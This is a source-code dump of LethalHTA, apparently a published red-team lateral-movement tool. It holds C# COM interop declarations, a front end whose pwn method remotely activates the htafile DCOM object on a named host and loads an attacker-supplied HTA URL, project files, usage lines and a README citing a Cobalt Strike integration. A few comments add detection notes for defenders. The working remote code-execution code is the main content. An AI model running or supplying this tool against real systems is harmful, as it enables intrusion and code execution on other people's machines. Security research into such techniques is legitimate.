[In] ref Guid riid, [MarshalAs(UnmanagedType.IUnknown)] out object ppvObj); 74 | 75 | [MethodImpl(MethodImplOptions.InternalCall)] 76 | void Reduce([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] uint dwReduceHowFar, [In] [Out] [MarshalAs(UnmanagedType.Interface)] ref IMoniker ppmkToLeft, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkReduced); 77 | 78 | [MethodImpl(MethodImplOptions.InternalCall)] 79 | void ComposeWith([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkRight, [In] int fOnlyIfNotGeneric, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkComposite); 80 | 81 | [MethodImpl(MethodImplOptions.InternalCall)] 82 | void Enum([In] int fForward, [MarshalAs(UnmanagedType.Interface)] out IEnumMoniker ppenumMoniker); 83 | 84 | [MethodImpl(MethodImplOptions.InternalCall)] 85 | void IsEqual([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkOtherMoniker); 86 | 87 | [MethodImpl(MethodImplOptions.InternalCall)] 88 | void Hash( out uint pdwHash); 89 | 90 | [MethodImpl(MethodImplOptions.PreserveSig | MethodImplOptions.InternalCall)] 91 | int IsRunning([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkNewlyRunning); 92 | 93 | [MethodImpl(MethodImplOptions.InternalCall)] 94 | void GetTimeOfLastChange([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [Out] [MarshalAs(UnmanagedType.LPArray)] FILETIME[] pFileTime); 95 | 96 | [MethodImpl(MethodImplOptions.InternalCall)] 97 | void Inverse([MarshalAs(UnmanagedType.Interface)] out IMoniker ppmk); 98 | 99 | [MethodImpl(MethodImplOptions.InternalCall)] 100 | void CommonPrefixWith([In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkPrefix); 101 | 102 | [MethodImpl(MethodImplOptions.InternalCall)] 103 | void RelativePathTo([In] 
[MarshalAs(UnmanagedType.Interface)] IMoniker pmkOther, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkRelPath); 104 | 105 | [MethodImpl(MethodImplOptions.InternalCall)] 106 | void GetDisplayName([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [MarshalAs(UnmanagedType.LPWStr)] out string ppszDisplayName); 107 | 108 | [MethodImpl(MethodImplOptions.InternalCall)] 109 | void ParseDisplayName([In] [MarshalAs(UnmanagedType.Interface)] IBindCtx pbc, [In] [MarshalAs(UnmanagedType.Interface)] IMoniker pmkToLeft, [In] [MarshalAs(UnmanagedType.LPWStr)] string pszDisplayName, out uint pchEaten, [MarshalAs(UnmanagedType.Interface)] out IMoniker ppmkOut); 110 | 111 | [MethodImpl(MethodImplOptions.InternalCall)] 112 | void IsSystemMoniker( out uint pdwMksys); 113 | } 114 | 115 | [ComImport] 116 | [Guid("00000003-0000-0000-C000-000000000046")] 117 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 118 | [ComConversionLoss] 119 | public interface IMarshal 120 | { 121 | [MethodImpl(MethodImplOptions.InternalCall)] 122 | void GetUnmarshalClass([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out Guid pCid); 123 | 124 | [MethodImpl(MethodImplOptions.InternalCall)] 125 | void GetMarshalSizeMax([In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS, out uint pSize); 126 | 127 | [MethodImpl(MethodImplOptions.InternalCall)] 128 | void MarshalInterface([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] ref Guid riid, [In] IntPtr pv, [In] uint dwDestContext, [In] IntPtr pvDestContext, [In] uint MSHLFLAGS); 129 | 130 | [MethodImpl(MethodImplOptions.InternalCall)] 131 | void UnmarshalInterface([In] [MarshalAs(UnmanagedType.Interface)] IStream pstm, [In] ref Guid riid, out IntPtr ppv); 132 | 133 | [MethodImpl(MethodImplOptions.InternalCall)] 134 | void ReleaseMarshalData([In] 
[MarshalAs(UnmanagedType.Interface)] IStream pstm); 135 | 136 | [MethodImpl(MethodImplOptions.InternalCall)] 137 | void DisconnectObject([In] uint dwReserved); 138 | } 139 | 140 | /* IPersistMoniker, declared with its IID but without [ComImport]. In this listing only Load is called (from LethalHTA.pwn). */ [Guid("79EAC9C9-BAF9-11CE-8C82-00AA004BA90B")] 141 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 142 | interface IPersistMoniker 143 | { 144 | void GetClassID(out Guid p0); 145 | void IsDirty(); 146 | void Load(uint fFullyAvailable, LethalHTADotNet.IMoniker pimkName, IBindCtx pibc, uint grfMode); 147 | void Save(LethalHTADotNet.IMoniker pimkName, IBindCtx pbc, uint fRemember); 148 | void SaveCompleted(LethalHTADotNet.IMoniker pimkName, IBindCtx pibc); 149 | void GetCurMoniker(out LethalHTADotNet.IMoniker ppimkName); 150 | } 151 | } 152 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/LethalHTA.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using static LethalHTADotNet.ComUtils; 3 | 4 | namespace LethalHTADotNet 5 | { 6 | /* Command-line front end: takes a host name and an HTA URL and drives the COM calls declared in ComUtils. */ public class LethalHTA 7 | { 8 | /* iUnknown is not referenced anywhere in this file (the code below uses ComUtils.IID_IUnknownPtr). */ static Guid iUnknown = new Guid("00000000-0000-0000-C000-000000000046"); 9 | /* CLSID handed to CoCreateInstanceEx below; the failure message in pwn calls it the htafile COM object. */ static Guid htafile = new Guid("3050F4D8-98B5-11CF-BB82-00AA00BDCE0B"); 10 | 11 | /* Activates the htafile class on the machine named by target (CLSCTX_REMOTE_SERVER) and calls IPersistMoniker.Load on the returned object, passing a FakeObject that wraps a URL moniker created for htaUrl. Parameters: target is the host name placed in COSERVERINFO.pwszName; htaUrl is the string given to CreateURLMonikerEx. Returns nothing. The HRESULT returned by CreateURLMonikerEx is ignored; a non-zero hr in the MULTI_QI result prints a failure message and returns; the try block that starts here continues past this line. pAuthInfo is IntPtr.Zero, so no explicit credentials are supplied - presumably the activation runs under the identity of the calling process (confirm). Defender note: on the receiving host this is a remote DCOM activation of the htafile class. NOTE(review): expect it to show up as mshta.exe started by the DCOM service host rather than by an interactive parent, followed by a fetch of the supplied URL - confirm in a lab before writing detections. Restricting remote DCOM launch/activation permissions and blocking or alerting on mshta.exe are the relevant controls. */ public void pwn(string target, string htaUrl) 12 | { 13 | try 14 | { 15 | IMoniker moniker; 16 | CreateURLMonikerEx(IntPtr.Zero, htaUrl, out moniker, 0); 17 | 18 | /* One result slot, asking only for IUnknown. */ MULTI_QI[] mqi = new MULTI_QI[1]; 19 | mqi[0].pIID = IID_IUnknownPtr; 20 | 21 | COSERVERINFO info = new COSERVERINFO(); 22 | info.pwszName = target; 23 | info.dwReserved1 = 0; 24 | info.dwReserved2 = 0; 25 | info.pAuthInfo = IntPtr.Zero; 26 | 27 | CoCreateInstanceEx(htafile, null, CLSCTX.CLSCTX_REMOTE_SERVER, info, 1, mqi); 28 | /* CoCreateInstanceEx is declared void in ComUtils, so this per-interface hr is the only failure signal checked. */ if (mqi[0].hr != 0) 29 | { 30 | Console.WriteLine("Creating htafile COM object failed on target"); 31 | return; 32 | } 33 | 34 | IPersistMoniker iPersMon = (IPersistMoniker)mqi[0].pItf; 35 | FakeObject fake = new FakeObject(moniker); 36 | iPersMon.Load(0, fake, null, 0);
37 | } 38 | catch (Exception e) 39 | { 40 | Console.WriteLine("Exception: " + e); 41 | } 42 | } 43 | 44 | 45 | public static void Main(string[] args) 46 | { 47 | 48 | if (args.Length != 2) 49 | { 50 | Console.WriteLine("LethalHTADotNet.exe target url/to/hta"); 51 | return; 52 | } 53 | LethalHTA hta = new LethalHTA(); 54 | hta.pwn(args[0], args[1]); 55 | 56 | } 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/LethalHTADotNet.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6} 8 | Exe 9 | LethalHTADotNet 10 | LethalHTADotNet 11 | v2.0 12 | 512 13 | true 14 | 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | true 38 | bin\x64\Debug\ 39 | DEBUG;TRACE 40 | full 41 | x64 42 | prompt 43 | MinimumRecommendedRules.ruleset 44 | true 45 | 46 | 47 | bin\x64\Release\ 48 | TRACE 49 | true 50 | pdbonly 51 | x64 52 | prompt 53 | MinimumRecommendedRules.ruleset 54 | true 55 | 56 | 57 | LethalHTADotNet.LethalHTA 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /DotNet/LethalHTADotNet/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("LethalHTADotNet")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("LethalHTADotNet")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DotNet/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTADotNet 2 | VisualStudio project of the C# implementation of LethalHTA. 
3 | 4 | 5 | ## Usage 6 | ```cmd 7 | LethalHTADotNet.exe target url/to/hta 8 | 9 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Code White GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /Native/LethalHTA.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27703.2035 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "LethalHTA", "LethalHTA\LethalHTA.vcxproj", "{32AB6C37-D492-466B-8151-D91096E2E114}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x64.ActiveCfg = Debug|x64 17 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x64.Build.0 = Debug|x64 18 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x86.ActiveCfg = Debug|Win32 19 | {32AB6C37-D492-466B-8151-D91096E2E114}.Debug|x86.Build.0 = Debug|Win32 20 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x64.ActiveCfg = Release|x64 21 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x64.Build.0 = Release|x64 22 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x86.ActiveCfg = Release|Win32 23 | {32AB6C37-D492-466B-8151-D91096E2E114}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {EEFEF59C-2C96-44DA-853C-F9B57D50995D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Native/LethalHTA/LethalHTA.cpp: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/LethalHTA.cpp -------------------------------------------------------------------------------- /Native/LethalHTA/LethalHTA.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {32AB6C37-D492-466B-8151-D91096E2E114} 24 | Win32Proj 25 | LethalHTA 26 | 10.0.17134.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | Use 102 | Level3 103 | Disabled 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Use 116 | Level3 117 | MaxSpeed 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | Use 134 | Level3 135 | MaxSpeed 136 | true 137 | true 138 | true 139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | Create 157 | Create 158 | Create 159 | Create 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- 
/Native/LethalHTA/LethalHTA.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | -------------------------------------------------------------------------------- /Native/LethalHTA/stdafx.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/stdafx.cpp -------------------------------------------------------------------------------- /Native/LethalHTA/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/stdafx.h -------------------------------------------------------------------------------- /Native/LethalHTA/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/Native/LethalHTA/targetver.h -------------------------------------------------------------------------------- /Native/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA 2 | VisualStudio project of the native implementation of LethalHTA. 
3 | 4 | ## Usage 5 | ```cmd 6 | LethalHTA.exe 7 | 8 | ``` 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA 2 | Repository for our lateral movement technique, which uses DCOM and HTA. 3 | 4 | For details, see our blog post: https://codewhitesec.blogspot.com/2018/07/lethalhta.html 5 | 6 | # Repo structure 7 | 8 | * CobaltStrike - The Cobalt Strike integration of LethalHTADotNet 9 | * DotNet - Visual Studio project for LethalHTADotNet 10 | * Native - Visual Studio project for LethalHTA 11 | --------------------------------------------------------------------------------